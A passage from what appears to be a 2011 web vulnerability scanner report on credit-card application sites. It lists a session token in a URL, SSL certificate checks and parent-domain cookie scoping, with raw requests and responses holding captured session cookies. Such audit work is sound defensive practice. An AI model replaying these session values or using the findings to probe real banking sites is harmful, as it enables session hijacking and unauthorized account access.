User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:56 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:16 GMT
ETag: "1c8af-b3-4481dc0fe8600"
Accept-Ranges: bytes
Content-Length: 179
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .
....555mmm444888bbbGGGXXX...............\\\.........~~~........................RRR...999UUU...333!.......,.... .
...0..%P3T.h.....3..gSG....-...s.8$.... |...sJ.Z..g..;

7.12. https://application.capitalone.com/icoreapp/images/icons/icon_tooltip.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/icons/icon_tooltip.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/icons/icon_tooltip.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/icons/icon_tooltip.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:38 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:16 GMT
ETag: "1c8b0-eb-4481dc0fe8600"
Accept-Ranges: bytes
Content-Length: 235
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a........c....}...............b................ e~......................d..b..b..b..c..b..d..d..c..c....!.......,..........h .4].y....'rZ...`...XU.u..'P(t...Gc.t......`V.....&......x.)pC..4....9
...[SNIP]...

8. SSL certificate previous next
There are 13 instances of this issue:

https://applynowdc1.chase.com/
https://applynowdc2.chase.com/
https://wtp101.com/
https://application.capitalone.com/
https://applynow.chase.com/
https://creditcards.citi.com/
https://online.citibank.com/
https://www.accountonline.com/
https://www.applyonlinenow.com/
https://www.citicards.com/
https://www.discovercard.com/
https://www201.americanexpress.com/
https://www262.americanexpress.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://applynowdc1.chase.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.2. https://applynowdc2.chase.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://applynowdc2.chase.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.3. https://wtp101.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://wtp101.com
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	CN=admin1.adnetik.iponweb.net
Issued by:	CN=admin1.adnetik.iponweb.net
Valid from:	Sun Jun 06 07:11:25 CDT 2010
Valid to:	Wed Jun 03 07:11:25 CDT 2020

8.4. https://application.capitalone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://application.capitalone.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	application.capitalone.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Sep 28 19:00:00 CDT 2010
Valid to:	Wed Nov 19 17:59:59 CST 2014

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.5. https://applynow.chase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynow.chase.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.6. https://creditcards.citi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	creditcards.citi.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Jul 22 19:00:00 CDT 2010
Valid to:	Sun Jul 22 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.7. https://online.citibank.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	online.citibank.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Aug 24 19:00:00 CDT 2009
Valid to:	Thu Aug 25 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.8. https://www.accountonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.accountonline.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.accountonline.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jun 06 19:00:00 CDT 2011
Valid to:	Tue Jul 02 18:59:59 CDT 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.9. https://www.applyonlinenow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.applyonlinenow.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Wed Feb 09 18:00:00 CST 2011
Valid to:	Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.10. https://www.citicards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.citicards.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Jun 01 19:00:00 CDT 2011
Valid to:	Tue Jul 02 18:59:59 CDT 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.11. https://www.discovercard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.discovercard.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Nov 04 19:00:00 CDT 2010
Valid to:	Sat Nov 05 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.12. https://www201.americanexpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www201.americanexpress.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www201.americanexpress.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Aug 15 19:00:00 CDT 2010
Valid to:	Tue Aug 16 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.13. https://www262.americanexpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www262.americanexpress.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Mar 06 18:00:00 CST 2011
Valid to:	Sun Apr 08 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9. Cookie scoped to parent domain previous next
There are 44 instances of this issue:

http://www.capitalone.com/smallbusiness/cards/venture-for-business/
http://as00.estara.com/fs/ruleaction.php
http://b.scorecardresearch.com/b
http://cf.addthis.com/red/p.json
http://click.linksynergy.com/fs-bin/click
http://click.linksynergy.com/fs-bin/click
http://pixel.33across.com/ps/
http://sales.liveperson.net/hc/32528459/
http://tags.bluekai.com/site/2750
http://tags.bluekai.com/site/2939
http://www.capitalone.com/css/global/portal_base.css
http://www.capitalone.com/css/global/portal_common.css
http://www.capitalone.com/css/global/portal_grid.css
http://www.capitalone.com/css/global/portal_print.css
http://www.capitalone.com/css/page-type/portal_landing-accordion.css
http://www.capitalone.com/css/page-type/portal_popup.css
http://www.capitalone.com/css/page-type/portal_product.css
http://www.capitalone.com/css/portal_footer.css
http://www.capitalone.com/css/portal_header.css
http://www.capitalone.com/css/portal_page-nav-heading.css
http://www.capitalone.com/img/global/icon/lock.gif
http://www.capitalone.com/img/global/logo/ehl.png
http://www.capitalone.com/img/global/logo/fdic.png
http://www.capitalone.com/img/global/logo/sprite/header.gif
http://www.capitalone.com/js/component/portal_accordion.js
http://www.capitalone.com/js/component/portal_open_account.js
http://www.capitalone.com/js/component/portal_swfobject.js
http://www.capitalone.com/js/component/portal_utilitynav.js
http://www.capitalone.com/js/global/cof/portal_header.js
http://www.capitalone.com/js/global/cof/portal_headerFooter.js
http://www.capitalone.com/js/global/portal_cof.js
http://www.capitalone.com/js/global/portal_footnote.js
http://www.capitalone.com/js/global/portal_global.js
http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js
http://www.capitalone.com/js/liveperson/mtagconfig.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js
http://www.capitalone.com/js/questus/config.js
http://www.capitalone.com/js/questus/intercept.js
http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png
http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg
http://www.wtp101.com/bk
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...

9.2. http://as00.estara.com/fs/ruleaction.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/fs/ruleaction.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106286435&urid=51189,45529&cookieurid=&estara_fsguid=04831D1D8268F1A4BA988C1220519DBD&dnc=1308312216957615571 HTTP/1.1
Host: as00.estara.com
